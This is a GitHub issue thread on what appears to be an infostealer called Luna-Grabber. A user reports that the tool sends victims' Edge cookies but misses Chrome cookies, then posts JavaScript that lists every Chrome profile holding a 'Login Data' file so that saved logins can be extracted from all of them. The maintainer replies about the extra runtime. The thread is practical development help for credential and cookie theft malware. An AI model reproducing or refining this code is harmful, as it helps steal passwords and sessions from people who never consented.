### ISSUE TITLE
Doesn't send all the cookies

### ISSUE THREAD

**Issue by iBiocide** [Smug246/Luna-Grabber#293]
hello, nice grabber except it doesn't send all the cookies, 
tested on windows 10 64bit, with data saved on edge and chrome, it sends the edge cookies but not chrome cookies,
i thought maybe the problem is because chrome uses profile 7 and it was missing in the code and added it but that was not the problem,
 i think instead of setting the **default profile path**, you need to filter all directories in `/Chrome/User Data/` and show only the directories that include `Login Data` file and make sure the directory is not `System Profile` because its not useful `(The System Profile is a built-in-with-Chrome profile that backs the User Manager. Users do not use it for actual browsing; it provides a Profile for the User Manager (switch person window) only.)`, because when the user login by his google account to chrome and 
sync his data the default profile path will be changed to `Profile 1`, and also by this method you can extract all the accounts from all user profiles.

/
> * **Javascript Example Code:**
> 
> ```js
> //Windows;
> 
> const fs = require('fs');
> 
> let homeDir = `C:/Users/${require("os").userInfo().username}`
> 
> let chromeProfilesPath = homeDir + "/AppData/Local/Google/Chrome/User Data/"
> 
> let chromeProfiles = [];
> 
> //Show all dirs in chromeProfilesPath;
> 
> fs.readdir(chromeProfilesPath, function (err, dirs) {
>     //Filter all directories in chromeProfilesPath and show only the directory who includes "Login Data" file!
> 
>     dirs = dirs.filter(dir => fs.existsSync(`${chromeProfilesPath}${dir}/Login\ Data`) && dir != "System Profile")
>     // Push results to chromeProfiles;
>     for (var i = 0; i < dirs.length; i++) {
>         chromeProfiles.push(`${chromeProfilesPath}/${dirs[i]}`)
>     }
> 
>     //Show extracted profiles!
>     console.log(chromeProfiles)
> });
> ```
> 
> And to extract all the data from all the profiles you can use:
> 
> * access all the extracted profiles and extract the data one by one:
> 
> ```js
>     for (var i = 0; i < chromeProfiles.length; i++) {
>         console.log(`Getting Data from ${chromeProfiles[i]}`);
>         extractData(chromeProfiles[i])// Your extractData function;
>     }
> ```

**Comment by Smug246** [comment]
i'll look into that

**Comment by Smug246** [comment]
problem with this is that it increases runtime by 5 seconds even though i've optimised it as much as i can. and that's considering i only use 1 browser and deleted the others
